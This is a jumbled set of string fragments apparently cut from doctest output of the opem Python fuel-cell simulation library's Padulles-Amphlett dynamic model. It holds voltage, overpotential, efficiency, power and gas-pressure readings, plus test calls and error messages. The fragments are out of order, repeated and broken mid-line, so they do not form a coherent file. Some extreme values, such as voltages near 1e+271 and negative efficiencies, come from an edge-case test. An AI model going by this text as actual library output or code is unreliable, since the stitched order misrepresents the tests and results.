0.19051530890352164 atm Power-Thermal : 2.8809969177338575 W ########### I", ": 0.23185017288443285 V PH2 : 0.1971566919511875 atm PH2O : 0.24266586776736396 atm PO2 :", ": 0.19700213775342923 atm PH2O : 0.24247563821874998 atm PO2 : 0.19053117457991825 atm Power-Thermal :", "Eta Activation : 0.38715939375662295 V Eta Concentration : 0.00041466432635066115 V Eta Ohmic :", ": 0.3443319458183834 V Eta Concentration : 0.00021575349319660598 V Eta Ohmic : 0.0019366035503462617 V", "W ########### I : 3.2 E : 6.068367804773196 V Eta Activation : 0.41506683170178466", "W ########### I : 3.3 E : 6.0683662652154 V Eta Activation : 0.417106024344736", "Power : 7.879484179737301 W FC Voltage : 4.147096936703843 V Loss : 
0.38425817529700723 V", "Ohmic : 0.0008785557847524419 V FC Efficiency : 0.5901164085980564 FC Power : 2.30145399353242 W", "0.1905549730945132 atm Power-Thermal : 1.781480108817652 W ########### I : 1.1 E : 6.068400120676597", "Eta Activation : 0.39024111055794025 V Eta Concentration : 0.0004347034505143372 V Eta Ohmic :", "Eta Activation : 0.3839273955127959 V Eta Concentration : 0.00039465233709598025 V Eta Ohmic :", "Eta Concentration : 0.0002949968562774962 V Eta Ohmic : 0.002644278024175193 V FC Efficiency :", ": 7.879484179737301 W FC Voltage : 4.147096936703843 V Loss : 0.38425817529700723 V PH2", "1.5 E : 6.068393967445208 V Eta Activation : 0.3648724409731032 V Eta Concentration :", "W ########### I : 2.4 E : 6.068380118926627 V Eta Activation : 0.3960054536369255", "9.331810347802308e+271 W ########### I : 4.0 E : 6.144553093215826 V Eta Activation :", "opem.Dynamic.Padulles_Amphlett import * >>> import shutil >>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":343,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":0.1,\"i-stop\":4,\"i-step\":0.1,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True) ########### Padulles-Amphlett-Model", "Power-Thermal : 7.259039668139408 W ########### I : 3.4 E : 6.06836472559345 V Eta", "V Eta Ohmic : 0.0005267910327125488 V FC Efficiency : 0.6120471438396443 FC Power :", "FC Power : 4.769576467003663 W FC Voltage : 4.335978606366966 V Loss : 0.3464843028619262", "0.19684758355567097 atm PH2O : 0.242285408670136 atm PO2 : 0.1904439133597369 atm Power-Thermal : 5.004572056867657", "0.1906105029619013 atm Power-Thermal : 0.41280968341523216 W ########### I : 0.4 E : 6.068410886366294", ": 0.0038871991293599716 V FC Efficiency : 0.5250728373249665 FC Power : 9.010249888496427 W FC", "FC Voltage : 3.918455976181777 V Loss : 
0.4299811339950573 V PH2 : 0.1966789789762983 atm", "PH2O : 0.2422162342888218 atm PO2 : 0.19041218200694368 atm Power-Thermal : 5.992791140958347 W ###########", "PO2 : 0.1905946372855047 atm Power-Thermal : 0.7735460064675803 W ########### I : 0.6 E", ": 6.068369344266841 V Eta Activation : 0.4129629601316751 V Eta Concentration : 0.0006162888970501038 V", "I : 2.3 E : 6.068381657907269 V Eta Activation : 0.39318591119501267 V Eta", "W FC Voltage : 4.306183473128157 V Loss : 0.3524430218673324 V PH2 : 0.1970161881350436", "I : 0.5 E : 6.068409348602667 V Eta Activation : 0.2921240370409447 V Eta", "0.0006977152837847073 V Eta Ohmic : 0.006210893371826288 V FC Efficiency : 0.5036913732928463 FC Power", "0.40621862980268425 V Eta Concentration : 0.000555512176140013 V Eta Ohmic : 0.004957160562216277 V FC", "0.00442164533169592 V FC Efficiency : 0.5192622556245563 FC Power : 10.12561398467885 W FC Voltage", "Loss : 0.2931002723075654 V PH2 : 0.19711454080634436 atm PH2O : 0.24261398698137834 atm PO2", "FC Voltage : 3.9083739857013544 V Loss : 0.4319972241282524 V PH2 : 0.1966649285946839 atm", ": 0.19673518050275585 atm PH2O : 0.24214705990750765 atm PO2 : 0.19038045065415046 atm Power-Thermal :", "Activation : 0.4038089891176398 V Eta Concentration : 0.0005353086845364485 V Eta Ohmic : 0.004778536276705824", "Voltage : 4.079852105493149 V Loss : 0.397705910482824 V PH2 : 0.19686163393728537 atm PH2O", ": 0.0024671853140681515 V FC Efficiency : 0.5452780290261753 FC Power : 5.954436076965834 W FC", "V Eta Activation : 0.2583036192079603 V Eta Concentration : 5.853018266659147e-05 V Eta Ohmic", "Efficiency : 0.6120471438396443 FC Power : 1.4321903165847678 W FC Voltage : 4.7739677219492265 V", "Eta Activation : 0.2921240370409447 V Eta Concentration : 9.76794818682758e-05 V Eta Ohmic :", "Power-Thermal : 5.7435444057448075 W ########### I : 2.8 E : 6.068373962362936 V Eta", "V FC Efficiency : 0.5211232875604884 FC Power : 9.755427943132343 W FC Voltage :", 
"3.9393990084279658 V Loss : 0.4257931434330969 V PH2 : 0.19670707973952706 atm PH2O : 0.24211247271685057", "Power-Thermal : 5.992791140958347 W ########### I : 2.9 E : 6.068372423061707 V Eta", "10.494272955870581 W FC Voltage : 4.036258829180992 V Loss : 0.40642364231840483 V PH2 :", "14.106441514254398 W FC Voltage : 3.918455976181777 V Loss : 0.4299811339950573 V PH2 :", "Ohmic : 0.005314768076451755 V FC Efficiency : 0.5108802815228812 FC Power : 11.95459858763542 W", ": 0.40072369519096346 V PH2 : 0.19684758355567097 atm PH2O : 0.242285408670136 atm PO2 :", ">>> Padulles_Amphlett_Data[\"Status\"] True >>> Padulles_Amphlett_Data[\"P\"][5] 2.724941943281497 >>> Padulles_Amphlett_Data[\"I\"][5] 0.6 >>> Padulles_Amphlett_Data[\"V\"][5] 4.541569905469162 >>>", "0.5901164085980564 FC Power : 2.30145399353242 W FC Voltage : 4.60290798706484 V Loss :", ": 9.383659842634243 W FC Voltage : 4.079852105493149 V Loss : 0.397705910482824 V PH2", ": 0.3 E : 6.068412424065923 V Eta Activation : 0.2583036192079603 V Eta Concentration", "0.1904439133597369 atm Power-Thermal : 5.004572056867657 W ########### I : 2.5 E : 6.068378579881878", ": 7.498786919530012 W FC Voltage : 4.165992733072229 V Loss : 0.380479323755368 V PH2", "V Eta Ohmic : 0.0017599744011013664 V FC Efficiency : 0.5600666527156857 FC Power :", ": 0.24226811507480747 atm PO2 : 0.19043598052153862 atm Power-Thermal : 5.249386015321152 W ########### I", ": 0.19697403699020044 atm PH2O : 0.24244105102809288 atm PO2 : 0.19051530890352164 atm Power-Thermal :", "atm Power-Thermal : 8.555574184086693 W ########### I : 3.9 E : 6.068357026521189 V", "V FC Efficiency : 0.6120471438396443 FC Power : 1.4321903165847678 W FC Voltage :", "V Eta Ohmic : 0.004778536276705824 V FC Efficiency : 0.5157386322058496 FC Power :", ": 2.1 E : 6.068384735676256 V Eta Activation : 0.38715939375662295 V Eta Concentration", "########### I : 1.4 E : 6.06839550584913 V Eta Activation : 0.36030304442922906 V", "0.3524430218673324 V PH2 : 
0.1970161881350436 atm PH2O : 0.24249293181407852 atm PO2 : 0.19053910741811658", "########### I : 0.2 E : 6.068413961701556 V Eta Activation : 0.23146009851376736 V", "Ohmic : 0.0022902088041253615 V FC Efficiency : 0.5485505413555333 FC Power : 5.562302489345107 W", "Concentration : 0.0006162888970501038 V Eta Ohmic : 0.0054937518419525275 V FC Efficiency : 0.5093595307581349", ": 0.24261398698137834 atm PO2 : 0.1905946372855047 atm Power-Thermal : 0.7735460064675803 W ########### I", ": 1.5710516301767605 W ########### I : 1.0 E : 6.068401658824337 V Eta Activation", "Concentration : 0.0002553220624997795 V Eta Ohmic : 0.0022902088041253615 V FC Efficiency : 0.5485505413555333", "I : 1.5 E : 6.068393967445208 V Eta Activation : 0.3648724409731032 V Eta", "6.068380118926627 V Eta Activation : 0.3960054536369255 V Eta Concentration : 0.00047486339861378836 V Eta", "0.19670707973952706 atm PH2O : 0.24211247271685057 atm PO2 : 0.19036458497775385 atm Power-Thermal : 7.516043371344917", "V PH2 : 0.1970161881350436 atm PH2O : 0.24249293181407852 atm PO2 : 0.19053910741811658 atm", "atm PH2O : 0.2425275190047356 atm PO2 : 0.1905549730945132 atm Power-Thermal : 1.781480108817652 W", "4.404387077581378 V Loss : 0.3328032238653337 V PH2 : 0.19705833927988675 atm PH2O : 0.24254481260006414", "2.9 >>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=None) [Error] Vcell Calculation Error (Enernst:4.5, Loss:0.4, N:None) >>>", "W FC Voltage : 3.9614863490169867 V Loss : 0.4213762911512418 V PH2 : 0.19673518050275585", "0.00011729309032954864 V Eta Ohmic : 0.0010546098289093816 V FC Efficiency : 0.5822525519832258 FC Power", "I : 2.6 E : 6.068377040773017 V Eta Activation : 0.40130847825734167 V Eta", "FC Power : 9.755427943132343 W FC Voltage : 4.06476164297181 V Loss : 0.40072369519096346", "0.5157386322058496 FC Power : 10.861455594255196 W FC Voltage : 4.022761331205627 V Loss :", "W FC Voltage : 4.7739677219492265 V Loss : 0.25888894042333943 V PH2 : 0.19714264156957312", 
"6.068409348602667 V Eta Activation : 0.2921240370409447 V Eta Concentration : 9.76794818682758e-05 V Eta", "FC Voltage : -2.3185876665375803e+270 V Loss : 4.63717533307516e+269 V PH2 : 0.19717074233280188 atm", "# -*- coding: utf-8 -*- ''' >>> from opem.Dynamic.Padulles_Amphlett import * >>> import", "3.4 E : 6.06836472559345 V Eta Activation : 0.4190844003836543 V Eta Concentration :", ": 0.00657019196303564 V FC Efficiency : 0.50107358791043 FC Power : 14.460983747095012 W FC", ": 3.757170500110593e+272 W ########### Report is generating ... Warning : The value of", "0.3769483587657406 V Eta Concentration : 0.0003547094700620668 V Eta Ohmic : 0.003176255519565377 V FC", ": 6.068403196908046 V Eta Activation : 0.3310434726426763 V Eta Concentration : 0.0001762905810800498 V", "Voltage : 4.4443653479563885 V Loss : 0.324807877394268 V PH2 : 0.19707238966150117 atm PH2O", "0.19711454080634436 atm PH2O : 0.24261398698137834 atm PO2 : 0.1905946372855047 atm Power-Thermal : 0.7735460064675803", "Eta Concentration : 3.899435456560147e-05 V Eta Ohmic : 0.0003510800160998837 V FC Efficiency :", "Loss : 0.42361505111213504 V PH2 : 0.19672113012114145 atm PH2O : 0.2421297663121791 atm PO2", ": 0.19054704025631486 atm Power-Thermal : 1.9954235329963377 W ########### I : 1.2 E :", "PH2 : 0.19697403699020044 atm PH2O : 0.24244105102809288 atm PO2 : 0.19051530890352164 atm Power-Thermal", "W FC Voltage : 4.229335388177429 V Loss : 0.3678117158535559 V PH2 : 0.19697403699020044", "V FC Efficiency : 0.5140663396997094 FC Power : 11.227208859041653 W FC Voltage :", "0.1905708387709098 atm Power-Thermal : 1.3645077216348895 W ########### I : 0.9 E : 6.068403196908046", "Loss : 0.40642364231840483 V PH2 : 0.19681948279244216 atm PH2O : 0.2422508214794789 atm PO2", "0.19717074233280188 atm PH2O : 0.2426831613626925 atm PO2 : 0.1906263686382979 atm Power-Thermal : 2.3185876665375803e+269", "Ohmic : 0.003176255519565377 V FC Efficiency : 0.5341016324451575 FC Power : 7.498786919530012 
W", "PH2 : 0.19700213775342923 atm PH2O : 0.24247563821874998 atm PO2 : 0.19053117457991825 atm Power-Thermal", "PH2O : 0.24209517912152204 atm PO2 : 0.19035665213955555 atm Power-Thermal : 7.774225509105296 W ###########", "3.757170500110593e+272 W ########### Report is generating ... Warning : The value of I(>0.1)", "atm Power-Thermal : 6.49540141236458 W ########### I : 3.1 E : 6.068369344266841 V", "Activation : 0.39318591119501267 V Eta Concentration : 0.00045476978327314626 V Eta Ohmic : 0.004065229504538212", "Ohmic : 0.0005267910327125488 V FC Efficiency : 0.6120471438396443 FC Power : 1.4321903165847678 W", ": 5.249386015321152 W ########### I : 2.6 E : 6.068377040773017 V Eta Activation", "Power-Thermal : 2.8809969177338575 W ########### I : 1.6 E : 6.068392428977227 V Eta", "atm PH2O : 0.24214705990750765 atm PO2 : 0.19038045065415046 atm Power-Thermal : 7.003243683145644 W", "PO2 : 0.19048357755072845 atm Power-Thermal : 3.8055158202626993 W ########### I : 2.0 E", "0.0037092867838082735 V FC Efficiency : 0.5271753860695316 FC Power : 8.635132823818928 W FC Voltage", "atm PO2 : 0.19043598052153862 atm Power-Thermal : 5.249386015321152 W ########### I : 2.6", "Power : 11.95459858763542 W FC Voltage : 3.9848661958784737 V Loss : 0.41670093756357396 V", "0.30536758106117423 V PH2 : 0.19710049042472996 atm PH2O : 0.2425966933860498 atm PO2 : 0.1905867044473064", "8.033558485745605 W ########### I : 3.7 E : 6.068360106342617 V Eta Activation :", "V Eta Activation : 0.4129629601316751 V Eta Concentration : 0.0006162888970501038 V Eta Ohmic", "Concentration : 2.301179808139826e-06 V Eta Ohmic : 9.331810347802308e+270 V FC Efficiency : -5.981929710129684e+270", "Padulles_Amphlett_Data[\"EFF\"][5] 0.5822525519832258 >>> Padulles_Amphlett_Data[\"PO2\"][5] 0.1905867044473064 >>> Padulles_Amphlett_Data[\"PH2\"][5] 0.19710049042472996 >>> Padulles_Amphlett_Data[\"PH2O\"][5] 0.2425966933860498 >>> Padulles_Amphlett_Data[\"Ph\"][5]", "atm PO2 : 0.1906184358000996 atm 
Power-Thermal : 0.24816738054412169 W ########### I : 0.3", "V PH2 : 0.1967913820292134 atm PH2O : 0.2422162342888218 atm PO2 : 0.19041218200694368 atm", "########### I : 2.5 E : 6.068378579881878 V Eta Activation : 0.39870996749954657 V", ": 4.368519891182348 V Loss : 0.3399763535283976 V PH2 : 0.19704428889827239 atm PH2O :", "Power-Thermal : 2.432697510654893 W ########### I : 1.4 E : 6.06839550584913 V Eta", "0.6589203974773784 FC Power : 0.5139579100323552 W FC Voltage : 5.1395791003235525 V Loss :", ": 3.0 E : 6.0683708836963435 V Eta Activation : 0.4107901672807063 V Eta Concentration", "FC Power : 12.316313453731704 W FC Voltage : 3.9730043399134525 V Loss : 0.4190730008706778", "Voltage : -4.665905173901154e+271 V Loss : 9.331810347802308e+270 V PH2 : 0.19690378508212852 atm PH2O", "0.43396509140262446 V PH2 : 0.19665087821306954 atm PH2O : 0.2420432983355364 atm PO2 : 0.19033285362496066", "FC Power : 6.344003082266143 W FC Voltage : 4.229335388177429 V Loss : 0.3678117158535559", "0.002113348284589288 V FC Efficiency : 0.5520748042471996 FC Power : 5.1674201677537885 W FC Voltage", "Activation : 0.23146009851376736 V Eta Concentration : 3.899435456560147e-05 V Eta Ohmic : 0.0003510800160998837", "6.068393967445208 V Eta Activation : 0.3648724409731032 V Eta Concentration : 0.0002949968562774962 V Eta", "0.19673518050275585 atm PH2O : 0.24214705990750765 atm PO2 : 0.19038045065415046 atm Power-Thermal : 7.003243683145644", ": 0.19034871930135727 atm Power-Thermal : 8.033558485745605 W ########### I : 3.7 E :", ": 0.5422224856637728 FC Power : 6.344003082266143 W FC Voltage : 4.229335388177429 V Loss", "Padulles-Amphlett-Model Simulation ########### Analyzing . . . 
I : 0.1 E : 6.0684154992732005", "atm Power-Thermal : 2.8809969177338575 W ########### I : 1.6 E : 6.068392428977227 V", ": 6.14455344314445 V Eta Activation : 0.9092187394310518 V Eta Concentration : 1.1361117401857817e-07 V", ": 0.00023552453535116493 V Eta Ohmic : 0.002113348284589288 V FC Efficiency : 0.5520748042471996 FC", ": 1.781480108817652 W ########### I : 1.1 E : 6.068400120676597 V Eta Activation", "Activation : 0.18557231242539243 V Eta Concentration : 1.948431634418616e-05 V Eta Ohmic : 0.00017548304819292376", "Activation : 0.3769483587657406 V Eta Concentration : 0.0003547094700620668 V Eta Ohmic : 0.003176255519565377", "I : 3.5 E : 6.068363185907339 V Eta Activation : 0.42100548618901656 V Eta", ": 0.19698808737181484 atm PH2O : 0.24245834462342142 atm PO2 : 0.19052324174171997 atm Power-Thermal :", "PH2O : 0.24263128057670688 atm PO2 : 0.19060257012370302 atm Power-Thermal : 0.588897103358606 W ###########", "Loss : 0.3524430218673324 V PH2 : 0.1970161881350436 atm PH2O : 0.24249293181407852 atm PO2", ": 0.507882865258588 FC Power : 12.676756316854359 W FC Voltage : 3.9614863490169867 V Loss", ": 6.068398582464819 V Eta Activation : 0.35009414904739194 V Eta Concentration : 0.00023552453535116493 V", "V Loss : 0.2931002723075654 V PH2 : 0.19711454080634436 atm PH2O : 0.24261398698137834 atm", "Eta Ohmic : 0.0019366035503462617 V FC Efficiency : 0.55589469312397 FC Power : 4.769576467003663", "0.4190844003836543 V Eta Concentration : 0.0006773165893020328 V Eta Ohmic : 0.0060314264601405215 V FC", "0.4246884348310017 V Eta Concentration : 0.0007385973342150736 V Eta Ohmic : 0.00657019196303564 V FC", "0.1 E : 6.14455344314445 V Eta Activation : 0.9092187394310518 V Eta Concentration :", "0.1967632812659846 atm PH2O : 0.24218164709816473 atm PO2 : 0.19039631633054707 atm Power-Thermal : 6.49540141236458", "FC Power : 13.035960331860592 W FC Voltage : 3.950291009654725 V Loss : 0.42361505111213504", "V PH2 : 0.19717074233280188 atm PH2O : 
0.2426831613626925 atm PO2 : 0.1906263686382979 atm", "atm PH2O : 0.2423545830514502 atm PO2 : 0.19047564471253012 atm Power-Thermal : 4.041762851824391 W", "W ########### I : 3.5 E : 6.068363185907339 V Eta Activation : 0.42100548618901656", "atm PH2O : 0.24261398698137834 atm PO2 : 0.1905946372855047 atm Power-Thermal : 0.7735460064675803 W", "########### I : 2.7 E : 6.068375501600038 V Eta Activation : 0.4038089891176398 V", "atm Power-Thermal : 8.033558485745605 W ########### I : 3.7 E : 6.068360106342617 V", "PO2 : 0.19037251781595219 atm Power-Thermal : 7.259039668139408 W ########### I : 3.4 E", "Voltage : 4.129118574087805 V Loss : 0.387853540075361 V PH2 : 0.19690378508212852 atm PH2O", "V FC Efficiency : 0.50107358791043 FC Power : 14.460983747095012 W FC Voltage :", "[Error] Vcell Calculation Error (Enernst:4.5, Loss:0.4, N:None) >>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":2,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":5,\"i-stop\":0.1,\"i-step\":-2,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True) ###########", "V Eta Ohmic : 0.0012307785370829418 V FC Efficiency : 0.5755840434599239 FC Power :", ": 0.3769483587657406 V Eta Concentration : 0.0003547094700620668 V Eta Ohmic : 0.003176255519565377 V", ": 6.068390890445182 V Eta Activation : 0.3731623911228729 V Eta Concentration : 0.0003347784463987542 V", ": 0.38425817529700723 V PH2 : 0.1969178354637429 atm PH2O : 0.24237187664677873 atm PO2 :", ": 0.0005353086845364485 V Eta Ohmic : 0.004778536276705824 V FC Efficiency : 0.5157386322058496 FC", "Concentration : 4.6654999364844955e-06 V Eta Ohmic : 1.8785852500552963e+271 V FC Efficiency : -1.2042213141380103e+271", "atm Power-Thermal : 5.992791140958347 W ########### I : 2.9 E : 6.068372423061707 V", "0.0005960022064159204 V Eta Ohmic : 
0.005314768076451755 V FC Efficiency : 0.5108802815228812 FC Power", "Power-Thermal : 4.041762851824391 W ########### I : 2.1 E : 6.068384735676256 V Eta", "PH2O : 0.2420432983355364 atm PO2 : 0.19033285362496066 atm Power-Thermal : 8.555574184086693 W ###########", "4.553525621759973 >>> Padulles_Amphlett_Data[\"V0\"] 4.698326931114575 >>> Padulles_Amphlett_Data[\"K\"] -0.24133551559100302 >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod={}, TestMode=True, PrintMode=False) >>> Padulles_Amphlett_Data[\"Status\"]", ": 0.19674923088437024 atm PH2O : 0.2421643535028362 atm PO2 : 0.1903883834923488 atm Power-Thermal :", "Eta Activation : 0.4190844003836543 V Eta Concentration : 0.0006773165893020328 V Eta Ohmic :", "Eta Concentration : 0.0007795927885366656 V Eta Ohmic : 0.006929978850845375 V FC Efficiency :", "FC Voltage : 4.489555538987407 V Loss : 0.3157701467791963 V PH2 : 0.19708644004311557 atm", "0.5366552535984287 FC Power : 7.116048662715165 W FC Voltage : 4.185910978067744 V Loss :", "True >>> Padulles_Amphlett_Data[\"P\"][5] 2.724941943281497 >>> Padulles_Amphlett_Data[\"I\"][5] 0.6 >>> Padulles_Amphlett_Data[\"V\"][5] 4.541569905469162 >>> Padulles_Amphlett_Data[\"EFF\"][5] 0.5822525519832258", "Power-Thermal : 3.757170500110593e+272 W ########### Report is generating ... 
Warning : The value", ": 4.06476164297181 V Loss : 0.40072369519096346 V PH2 : 0.19684758355567097 atm PH2O :", "Loss : 0.3912833448667819 V PH2 : 0.19688973470051413 atm PH2O : 0.24233728945612165 atm PO2", ": 0.2422508214794789 atm PO2 : 0.1904280476833403 atm Power-Thermal : 5.495727044129421 W ########### I", ": 0.41173130254104057 V PH2 : 0.1967913820292134 atm PH2O : 0.2422162342888218 atm PO2 :", "Power : 7.116048662715165 W FC Voltage : 4.185910978067744 V Loss : 0.3764959824754877 V", "Vcell_Calc(Enernst=4.5, Loss=0.4, N=4) 2.9 >>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=None) [Error] Vcell Calculation Error (Enernst:4.5,", ": 7.774225509105296 W ########### I : 3.6 E : 6.068361646157063 V Eta Activation", "Power-Thermal : 7.003243683145644 W ########### I : 3.3 E : 6.0683662652154 V Eta", "atm PH2O : 0.2423199958607931 atm PO2 : 0.1904597790361335 atm Power-Thermal : 4.519750111503576 W", "Eta Ohmic : 0.0024671853140681515 V FC Efficiency : 0.5452780290261753 FC Power : 5.954436076965834", "PO2 : 0.19056290593271147 atm Power-Thermal : 1.5710516301767605 W ########### I : 1.0 E", "FC Power : 7.116048662715165 W FC Voltage : 4.185910978067744 V Loss : 0.3764959824754877", "0.5108802815228812 FC Power : 11.95459858763542 W FC Voltage : 3.9848661958784737 V Loss :", "3.8985331094508706 V Loss : 0.43396509140262446 V PH2 : 0.19665087821306954 atm PH2O : 0.2420432983355364", "Efficiency : 0.5293741761651032 FC Power : 8.25823714817561 W FC Voltage : 4.129118574087805 V", "PO2 : 0.19047564471253012 atm Power-Thermal : 9.331810347802308e+271 W ########### I : 4.0 E", "V Loss : 0.37228332551300575 V PH2 : 0.19695998660858605 atm PH2O : 0.24242375743276434 atm", "FC Power : 2.724941943281497 W FC Voltage : 4.541569905469162 V Loss : 0.30536758106117423", "Power-Thermal : 1.3645077216348895 W ########### I : 0.9 E : 6.068403196908046 V Eta", "Loss : 0.40912283407888206 V PH2 : 0.19680543241082776 atm PH2O : 0.24223352788415034 atm PO2", "Eta Activation : 
0.39870996749954657 V Eta Concentration : 0.000494984370825149 V Eta Ohmic :", "I : 1.4 E : 6.06839550584913 V Eta Activation : 0.36030304442922906 V Eta", "atm PO2 : 0.19038045065415046 atm Power-Thermal : 7.003243683145644 W ########### I : 3.3", "I : 0.1 E : 6.0684154992732005 V Eta Activation : 0.18557231242539243 V Eta", "Activation : 0.4107901672807063 V Eta Concentration : 0.0005960022064159204 V Eta Ohmic : 0.005314768076451755", ": 0.004243378155424144 V FC Efficiency : 0.5211232875604884 FC Power : 9.755427943132343 W FC", ": 4.095568131134739 V Loss : 0.39456301313781456 V PH2 : 0.19687568431889974 atm PH2O :", "Vcell Calculation Error (Enernst:4.5, Loss:0.4, N:None) >>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":2,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":5,\"i-stop\":0.1,\"i-step\":-2,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True) ########### Padulles-Amphlett-Model", ": 0.5192622556245563 FC Power : 10.12561398467885 W FC Voltage : 4.05024559387154 V Loss", "False >>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=4) 2.9 >>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=None) [Error] Vcell Calculation", "E : 6.06836472559345 V Eta Activation : 0.4190844003836543 V Eta Concentration : 0.0006773165893020328", "V Eta Ohmic : 0.0003510800160998837 V FC Efficiency : 0.6293798842665886 FC Power :", "E : 6.144553272737403 V Eta Activation : 0.9103753288368093 V Eta Concentration : 2.301179808139826e-06", ": 0.24266586776736396 atm PO2 : 0.1906184358000996 atm Power-Thermal : 0.24816738054412169 W ########### I", "PO2 : 0.19038045065415046 atm Power-Thermal : 7.003243683145644 W ########### I : 3.3 E", "Efficiency : 0.5023661507925354 FC Power : 14.106441514254398 W FC Voltage : 3.918455976181777 V", "0.4085437792118771 V Eta Concentration : 
0.0005757433248249061 V Eta Ohmic : 0.005135904406545483 V FC", "E : 6.068358566463993 V Eta Activation : 0.4264559863331208 V Eta Concentration : 0.0007590808465813247", "0.0007795927885366656 V Eta Ohmic : 0.006929978850845375 V FC Efficiency : 0.49857958703411753 FC Power", "0.19688973470051413 atm PH2O : 0.24233728945612165 atm PO2 : 0.19046771187433184 atm Power-Thermal : 4.279867176181073", ": 0.0002949968562774962 V Eta Ohmic : 0.002644278024175193 V FC Efficiency : 0.5422224856637728 FC", "0.24233728945612165 atm PO2 : 0.19046771187433184 atm Power-Thermal : 4.279867176181073 W ########### I :", "Concentration : 0.0003746674093630815 V Eta Ohmic : 0.0033538152156708046 V FC Efficiency : 0.5316790944492106", "PH2O : 0.2422508214794789 atm PO2 : 0.1904280476833403 atm Power-Thermal : 5.495727044129421 W ###########", "Concentration : 0.0006366034731784721 V Eta Ohmic : 0.005672855976278701 V FC Efficiency : 0.507882865258588", "FC Voltage : 4.206975801412199 V Loss : 0.37228332551300575 V PH2 : 0.19695998660858605 atm", "I : 3.1 E : 6.068369344266841 V Eta Activation : 0.4129629601316751 V Eta", "2.7 E : 6.068375501600038 V Eta Activation : 0.4038089891176398 V Eta Concentration :", "0.18557231242539243 V Eta Concentration : 1.948431634418616e-05 V Eta Ohmic : 0.00017548304819292376 V FC", ": 4.147096936703843 V Loss : 0.38425817529700723 V PH2 : 0.1969178354637429 atm PH2O :", ": 4.677757241603485 V Loss : 0.27813072895256186 V PH2 : 0.19712859118795872 atm PH2O :", "2.432697510654893 W ########### I : 1.4 E : 6.06839550584913 V Eta Activation :", "W FC Voltage : 4.095568131134739 V Loss : 0.39456301313781456 V PH2 : 0.19687568431889974", "0.2422508214794789 atm PO2 : 0.1904280476833403 atm Power-Thermal : 5.495727044129421 W ########### I :", "0.005135904406545483 V FC Efficiency : 0.5124481138904448 FC Power : 11.591576336201861 W FC Voltage", "FC Efficiency : 0.5230579622427114 FC Power : 9.383659842634243 W FC Voltage : 4.079852105493149", "Error 
(Enernst:4.5, Loss:0.4, N:None) >>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":2,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":5,\"i-stop\":0.1,\"i-step\":-2,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True) ########### Padulles-Amphlett-Model Simulation ###########", "Voltage : 4.541569905469162 V Loss : 0.30536758106117423 V PH2 : 0.19710049042472996 atm PH2O", "4.698326931114575 >>> Padulles_Amphlett_Data[\"K\"] -0.24133551559100302 >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod={}, TestMode=True, PrintMode=False) >>> Padulles_Amphlett_Data[\"Status\"] False >>> Vcell_Calc(Enernst=4.5,", "6.49540141236458 W ########### I : 3.1 E : 6.068369344266841 V Eta Activation :", "W ########### I : 2.2 E : 6.068383196823811 V Eta Activation : 0.39024111055794025", "V Eta Ohmic : 0.006210893371826288 V FC Efficiency : 0.5036913732928463 FC Power :", "FC Power : 11.591576336201861 W FC Voltage : 3.997095288345469 V Loss : 0.4142554269432475", "PH2O : 0.2423545830514502 atm PO2 : 0.19047564471253012 atm Power-Thermal : 9.331810347802308e+271 W ###########", "V Eta Activation : 0.4264559863331208 V Eta Concentration : 0.0007590808465813247 V Eta Ohmic", "PH2O : 0.2426831613626925 atm PO2 : 0.1906263686382979 atm Power-Thermal : 2.3185876665375803e+269 W ###########", "V FC Efficiency : 0.5341016324451575 FC Power : 7.498786919530012 W FC Voltage :", ": 0.19690378508212852 atm PH2O : 0.2423545830514502 atm PO2 : 0.19047564471253012 atm Power-Thermal :", "11.591576336201861 W FC Voltage : 3.997095288345469 V Loss : 0.4142554269432475 V PH2 :", ": 0.0010546098289093816 V FC Efficiency : 0.5822525519832258 FC Power : 2.724941943281497 W FC", "Power : 3.1426888772911847 W FC Voltage : 4.489555538987407 V Loss : 0.3157701467791963 V", ": -2.3185876665375803e+270 
